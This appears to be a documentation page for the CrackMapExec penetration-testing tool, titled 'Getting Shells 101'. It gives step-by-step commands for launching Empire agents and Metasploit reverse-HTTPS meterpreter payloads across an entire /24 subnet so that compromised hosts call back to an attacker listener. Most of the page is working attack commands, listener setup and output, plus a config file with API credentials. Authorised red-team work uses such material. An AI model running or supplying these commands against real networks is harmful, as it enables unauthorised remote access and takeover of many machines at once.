Getting Shells 101

Getting Shells 101

We all love shells and that's why CME makes it as easy as possible to get them! There really is something magical about shelling a /24

Empire Agent

Use the new Empire in Python3 https://github.com/BC-SECURITY/Empire​
We can use the empire_exec module to execute an Empire Agent's initial stager. In the background, the module connects to Empire's RESTful API, generates a launcher for the specified listener and executes it.
  • First setup the rest API:
#~ python powershell-empire --rest --user empireadmin --pass Password123!
[*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/
* Starting Empire RESTful API on port: 1337
* RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml
* Running on https://0.0.0.0:1337/ (Press CTRL+C to quit)
  • Second setup a listener:
(Empire: listeners) > set Name test
(Empire: listeners) > set Host 192.168.10.3
(Empire: listeners) > set Port 9090
(Empire: listeners) > set CertPath data/empire.pem
(Empire: listeners) > run
(Empire: listeners) > list
​
[*] Active listeners:
​
ID Name Host Type Delay/Jitter KillDate Redirect Target
-- ---- ---- ------- ------------ -------- ---------------
1 test http://192.168.10.3:9090 native 5/0.0
​
(Empire: listeners) >
The username and password that CME uses to authenticate to Empire's RESTful API are stored in the cme.conf file located at ~/.cme/cme.conf:
[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!
​
[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
  • Then just run the empire_exec module and specify the listener name:
#~ crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test
image

Meterpreter

We can use the metinject module launch a meterpreter using Invoke-MetasploitPayload Invoke-MetasploitPayload.ps1 script.
On your Metasploit instance, run the following commands
use exploit/multi/script/web_delivery
The SRVHOST and SRVPORT variables are used for running the webserver to host the script
set SRVHOST 10.211.55
set SRVPORT 8443
The target variable determines what type of script we're using. 2 is for PowerShell
set target 2
Pick your payload. In this case, we'll use a reverse https meterpreter payload
set payload windows/meterpreter/reverse_https
set LHOST 10.211.55
set LPORT 443
Run the exploit
run -j
Once run, the web_delivery module will spin up the webserver to host the script and reverse listener for our meterpreter session.
msf exploit(web_delivery) > run -j
[*] Exploit running as background job.
​
[*] Started HTTPS reverse handler on https://10.211.55.4:8443/
[*] Using URL: http://10.211.55.4:8080/eYEssEwv2D
[*] Local IP: http://10.211.55.4:8080/eYEssEwv2D
[*] Server started.
  • Then just run the met_inject module and specify the LHOST and LPORT values:
#~ crackmapexec 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http
​